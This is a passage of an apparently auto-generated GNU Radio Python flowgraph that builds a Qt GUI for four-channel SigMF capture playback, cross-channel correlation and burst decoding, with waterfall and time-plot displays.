self.main_tab_layout_1.addLayout(self.main_tab_grid_layout_1)
self.main_tab.addTab(self.main_tab_widget_1, 'Coarse Adjust')
self.main_tab_widget_2 = Qt.QWidget()
self.main_tab_layout_2 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_2)
self.main_tab_grid_layout_2 = Qt.QGridLayout()
self.main_tab_layout_2.addLayout(self.main_tab_grid_layout_2)
self.main_tab.addTab(self.main_tab_widget_2, 'Correlate')
self.main_tab_widget_3 = Qt.QWidget()
self.main_tab_layout_3 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_3)
self.main_tab_grid_layout_3 = Qt.QGridLayout()
self.main_tab_layout_3.addLayout(self.main_tab_grid_layout_3)
self.main_tab.addTab(self.main_tab_widget_3, 'Decode')
self.top_grid_layout.addWidget(self.main_tab, 0, 0, 1, 2)
for r in range(0, 1):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._trig_delay_tool_bar = Qt.QToolBar(self)
self._trig_delay_tool_bar.addWidget(Qt.QLabel("trig_delay"+": "))
self._trig_delay_line_edit = Qt.QLineEdit(str(self.trig_delay))
self._trig_delay_tool_bar.addWidget(self._trig_delay_line_edit)
self._trig_delay_line_edit.returnPressed.connect(
lambda: self.set_trig_delay(eng_notation.str_to_num(str(self._trig_delay_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._trig_delay_tool_bar, 2, 1, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._trig_channel_options = (0, 1, 2, 3, )
self._trig_channel_labels = ('chan0', 'chan1', 'chan2', 'chan3', )
self._trig_channel_tool_bar = Qt.QToolBar(self)
self._trig_channel_tool_bar.addWidget(Qt.QLabel("trig_channel"+": "))
self._trig_channel_combo_box = Qt.QComboBox()
self._trig_channel_tool_bar.addWidget(self._trig_channel_combo_box)
for label in self._trig_channel_labels: self._trig_channel_combo_box.addItem(label)
self._trig_channel_callback = lambda i: Qt.QMetaObject.invokeMethod(self._trig_channel_combo_box, "setCurrentIndex", Qt.Q_ARG("int", self._trig_channel_options.index(i)))
self._trig_channel_callback(self.trig_channel)
self._trig_channel_combo_box.currentIndexChanged.connect(
lambda i: self.set_trig_channel(self._trig_channel_options[i]))
self.main_tab_grid_layout_1.addWidget(self._trig_channel_tool_bar, 2, 0, 1, 1)
for r in range(2, 3):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._throttle_tool_bar = Qt.QToolBar(self)
self._throttle_tool_bar.addWidget(Qt.QLabel('Throttle'+": "))
self._throttle_line_edit = Qt.QLineEdit(str(self.throttle))
self._throttle_tool_bar.addWidget(self._throttle_line_edit)
self._throttle_line_edit.returnPressed.connect(
lambda: self.set_throttle(eng_notation.str_to_num(str(self._throttle_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._throttle_tool_bar, 9, 1, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(1, 2):
self.top_grid_layout.setColumnStretch(c, 1)
self._thresh_tool_bar = Qt.QToolBar(self)
self._thresh_tool_bar.addWidget(Qt.QLabel('GUI Threshold'+": "))
self._thresh_line_edit = Qt.QLineEdit(str(self.thresh))
self._thresh_tool_bar.addWidget(self._thresh_line_edit)
self._thresh_line_edit.returnPressed.connect(
lambda: self.set_thresh(eng_notation.str_to_num(str(self._thresh_line_edit.text().toAscii()))))
self.top_grid_layout.addWidget(self._thresh_tool_bar, 9, 0, 1, 1)
for r in range(9, 10):
self.top_grid_layout.setRowStretch(r, 1)
for c in range(0, 1):
self.top_grid_layout.setColumnStretch(c, 1)
self._delay_3_tool_bar = Qt.QToolBar(self)
self._delay_3_tool_bar.addWidget(Qt.QLabel("delay_3"+": "))
self._delay_3_line_edit = Qt.QLineEdit(str(self.delay_3))
self._delay_3_tool_bar.addWidget(self._delay_3_line_edit)
self._delay_3_line_edit.returnPressed.connect(
lambda: self.set_delay_3(int(str(self._delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_3_tool_bar, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_2_tool_bar = Qt.QToolBar(self)
self._delay_2_tool_bar.addWidget(Qt.QLabel("delay_2"+": "))
self._delay_2_line_edit = Qt.QLineEdit(str(self.delay_2))
self._delay_2_tool_bar.addWidget(self._delay_2_line_edit)
self._delay_2_line_edit.returnPressed.connect(
lambda: self.set_delay_2(int(str(self._delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_2_tool_bar, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_1_tool_bar = Qt.QToolBar(self)
self._delay_1_tool_bar.addWidget(Qt.QLabel("delay_1"+": "))
self._delay_1_line_edit = Qt.QLineEdit(str(self.delay_1))
self._delay_1_tool_bar.addWidget(self._delay_1_line_edit)
self._delay_1_line_edit.returnPressed.connect(
lambda: self.set_delay_1(int(str(self._delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_1_tool_bar, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_0_tool_bar = Qt.QToolBar(self)
self._delay_0_tool_bar.addWidget(Qt.QLabel("delay_0"+": "))
self._delay_0_line_edit = Qt.QLineEdit(str(self.delay_0))
self._delay_0_tool_bar.addWidget(self._delay_0_line_edit)
self._delay_0_line_edit.returnPressed.connect(
lambda: self.set_delay_0(int(str(self._delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_0_tool_bar, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._corr_alpha_0_3_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_3_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_3"+": "))
self._corr_alpha_0_3_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_3))
self._corr_alpha_0_3_tool_bar.addWidget(self._corr_alpha_0_3_line_edit)
self._corr_alpha_0_3_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_3(eng_notation.str_to_num(str(self._corr_alpha_0_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_3_tool_bar, 8, 2, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_2_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_2_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_2"+": "))
self._corr_alpha_0_2_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_2))
self._corr_alpha_0_2_tool_bar.addWidget(self._corr_alpha_0_2_line_edit)
self._corr_alpha_0_2_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_2(eng_notation.str_to_num(str(self._corr_alpha_0_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_2_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_1_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_1_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_1"+": "))
self._corr_alpha_0_1_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_1))
self._corr_alpha_0_1_tool_bar.addWidget(self._corr_alpha_0_1_line_edit)
self._corr_alpha_0_1_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_1(eng_notation.str_to_num(str(self._corr_alpha_0_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_1_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.single_pole_iir_filter_xx_0_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_3, nfft)
self.single_pole_iir_filter_xx_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_2, nfft)
self.single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_1, nfft)
self.sigmf_source_3 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN3_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_2 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN2_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_1 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN1_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_0 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN0_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.qtgui_waterfall_sink_x_0_0_1 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_1.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_1.enable_axis_labels(True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_1.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_1.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_1_win, 2, 3, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_0.enable_axis_labels(True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_0_win, 2, 2, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0.enable_axis_labels(True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_win, 2, 1, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0.enable_axis_labels(True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_win, 2, 0, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
nfft,
0,
1.0,
"x-Axis",
"y-Axis",
"Correlation",
3 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-140, 10)
self.qtgui_vector_sink_f_0.enable_autoscale(True)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_vector_sink_f_0_win, 0, 0, 4, 3)
for r in range(0, 4):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_1 = qtgui.time_sink_f(
128, #size
samp_rate / nfft, #samp_rate
"Correlation Magnitude", #name
3 #number of inputs
)
self.qtgui_time_sink_x_1.set_update_time(0.10)
self.qtgui_time_sink_x_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_1.enable_tags(-1, True)
self.qtgui_time_sink_x_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, "")
self.qtgui_time_sink_x_1.enable_autoscale(True)
self.qtgui_time_sink_x_1.enable_grid(True)
self.qtgui_time_sink_x_1.enable_axis_labels(True)
self.qtgui_time_sink_x_1.enable_control_panel(False)
self.qtgui_time_sink_x_1.enable_stem_plot(False)
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_1_win = sip.wrapinstance(self.qtgui_time_sink_x_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_time_sink_x_1_win, 4, 0, 4, 3)
for r in range(4, 8):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"Combined", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.enable_stem_plot(False)
self.qtgui_time_sink_x_0_1_0_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_0_win, 0, 4, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(4, 5):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN3", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_stem_plot(False)
self.qtgui_time_sink_x_0_1_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_win, 0, 3, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN2", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0.enable_stem_plot(False)
self.qtgui_time_sink_x_0_1_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_win, 0, 2, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN1", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0.enable_stem_plot(False)
self.qtgui_time_sink_x_0_1_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_win, 0, 1, 1, 1)
for r in range(0, 1):
